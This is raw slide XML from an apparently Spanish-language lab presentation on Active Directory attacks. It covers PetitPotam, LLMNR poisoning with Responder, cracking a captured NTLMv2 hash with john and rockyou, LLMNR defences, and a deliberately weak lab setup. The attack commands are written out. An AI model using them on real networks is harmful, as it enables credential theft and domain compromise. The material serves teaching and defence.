                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>NetrDfsAddStdRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>solo funciona contra los controladores de dominio.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La vulnerabilidad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>PetitPotam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> explota debilidades en el protocolo MS-EFSRPC (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Encrypting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>) de Microsoft, permitiendo a un atacante realizar ataques de relé de autenticación y obtener las credenciales del dominio de Windows. Esto puede conducir a un compromiso total del dominio y acceso no autorizado a los recursos de la red.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La PoC permite que un atacante envíe solicitudes SMB a la interfaz MS-EFSRPC de un sistema remoto y obligue a la computadora víctima a iniciar un procedimiento de autenticación y compartir su hash de autenticación NTLM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Este es el método vulnerable MS-EFSRPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>EfsRpcOpenFileRaw</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2156498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3CF1E6-42AE-A5EE-7C07-E2636CC5E2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Envenenamiento LLMNR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED72910A-364E-5341-0975-F0EC2F1A6D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2085475"/>
            <a:ext cx="8596668" cy="3955888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para realizar este ataque en la máquina Windows 10 entraremos con el usuario del dominio Alesander.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para realizar el envenenamiento  usaré la herramienta responder:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-E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https://github.com/lgandx/Responder</a:t>
            </a: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endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejecutaré responder con este comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E54998-3FF4-3ED1-8D82-1E54E4BFEE6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1128829" y="4781450"/>
            <a:ext cx="2458720" cy="56769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sudo python3 Responder.py -I enp0s3 --lm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2677884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71D733BF-B1E4-0549-9D30-2ED2D63848B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800762" y="1628346"/>
            <a:ext cx="4590476" cy="3304762"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1800333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09F751-05AB-F164-F683-1F40A8BC7AF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="288759"/>
            <a:ext cx="10953192" cy="5752604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora en el equipo cliente en este caso el Windows 10 intentaremos acceder a un recurso que no existe para acelerar el proceso:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EA33F6-F081-2251-AEC8-0734A0DA7EB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01959" y="1405672"/>
            <a:ext cx="5400040" cy="4431665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2407560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D9F41CA-A4F0-0D4A-68B1-351C68C4D40B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="545433"/>
            <a:ext cx="8596668" cy="6031830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Consiguiendo obtener el hash NTLVMv2 del usuario:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0534E4DB-81F6-A0BF-B401-A5C5E71B7F6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128" y="1457960"/>
            <a:ext cx="5400040" cy="4974924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715733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ABCEB6-79A1-79E6-90B8-BBFEF4FB9949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="545433"/>
            <a:ext cx="10151087" cy="6079956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El siguiente paso será usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para hacer un ataque de diccionario al hash:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7013D05-B918-D81B-F379-9B700F9D4E5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1235243" y="1957137"/>
            <a:ext cx="2520983" cy="80400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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>john</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wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/rockyou.txt ./logs/SMB-NTLMv2-SSP-fe80::e304:6db9:65d8:7c6.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF5FA999-08B3-FCB2-E995-3137F812D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243" y="3017552"/>
            <a:ext cx="6475730" cy="3295015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1600383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71DB4-6B4D-63C0-8DE9-CD0F87C67E02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Defensa LLMNR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31EF1ACF-E651-8E91-AFCE-E82B8F4508D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1636296"/>
            <a:ext cx="11386329" cy="4844716"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. Deshabilitar LLMNR y NBT-NS en los sistemas de la red: LLMNR y NBT-NS son protocolos de resolución de nombres utilizados para resolver nombres de dispositivos en una red local. Sin embargo, estos protocolos pueden ser utilizados por los atacantes para envenenar la caché de nombres y realizar ataques de suplantación de identidad. Deshabilitar estos protocolos puede ayudar a prevenir este tipo de ataques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Utilizar protocolos de red seguros: Utiliza protocolos de red seguros, como HTTPS, SSH o VPN, para proteger la información confidencial que se transmite en la red. Estos protocolos cifran los datos y hacen más difícil que un atacante pueda interceptarlos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. Utilizar autenticación fuerte: Es importante utilizar autenticación fuerte, como contraseñas seguras, autenticación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>multifactor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (MFA), o autenticación basada en certificados, para proteger las cuentas de usuario y evitar que los atacantes puedan obtener credenciales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4. Utilizar software de seguridad: Utilizar software de seguridad, como antivirus, firewalls y sistemas de detección de intrusiones (IDS), puede ayudar a detectar y prevenir ataques de envenenamiento LLMNR-NBT-NS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5. Actualizar el software y firmware: Es importante mantener actualizado el software y firmware de los dispositivos de red y sistemas operativos para corregir vulnerabilidades conocidas y prevenir ataques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="44546A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6. Monitorear la red: Monitorear la red en busca de actividad inusual, como tráfico de red anómalo o dispositivos desconocidos en la red, puede ayudar a detectar posibles ataques antes de que puedan causar daño.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1621516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88AB52B-7E4C-A2E8-C9EA-938A27383F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="144379"/>
            <a:ext cx="8596668" cy="5896983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Las configuraciones que tendré que aplicar a las máquinas serán estas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows 10:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Usuarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Tendremos un usuario llamado usuario con la contraseña 123456789</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Un usuario Administrador de este equipo llamado Alesander y con la contraseña abc123.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuración:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Habilitaremos el escritorio remoto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Instalaremos .NET Framework 3,5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Desactivaremos Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Update</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Crear una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>shadow</a:t>
